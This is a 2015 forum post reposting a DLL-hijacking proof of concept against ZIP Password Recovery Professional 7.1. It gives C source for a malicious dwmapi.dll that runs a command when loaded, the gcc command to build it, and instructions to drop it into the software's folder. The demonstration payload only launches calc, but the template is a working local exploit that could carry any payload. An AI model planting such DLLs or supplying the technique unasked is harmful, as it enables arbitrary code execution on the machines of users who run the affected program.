KhiZaRix Posted March 31, 2015 Report Posted March 31, 2015 (edited) /*#[+] Author: TUNISIAN CYBER#[+] Exploit Title: ZIP Password Recovery Professional 7.1 DLL Hijacking#[+] Date: 29-03-2015#[+] Type: Local Exploits#[+] Vendor: SmartKey ZIP Password Recovery – Recover ZIP, WinZip, PKZip Password#[+] Tested on: WinXp/Windows 7 Pro#[+] Friendly Sites: sec4ever.com#[+] Twitter: @TCYB3R#[+] gcc -shared -o dwmapi.dll tcyber.c# Copy it to the software dir. then execute the software , calc.exe will launch .Proof of Concept (PoC):=======================*/#include <windows.h>int tunisian(){WinExec("calc", 0);exit(0);return 0;}BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved){tunisian();return 0;}Source: http://dl.packetstormsecurity.net/1503-exploits/zipprp-dllhijack.txtEdit: Cer ca postu meu s? fie ?ters , originally posted by aerosol: https://rstforums.com/forum/99634-zip-password-recovery-professional-7-1-dll-hijacking.rst Edited March 31, 2015 by KhiZaRix Quote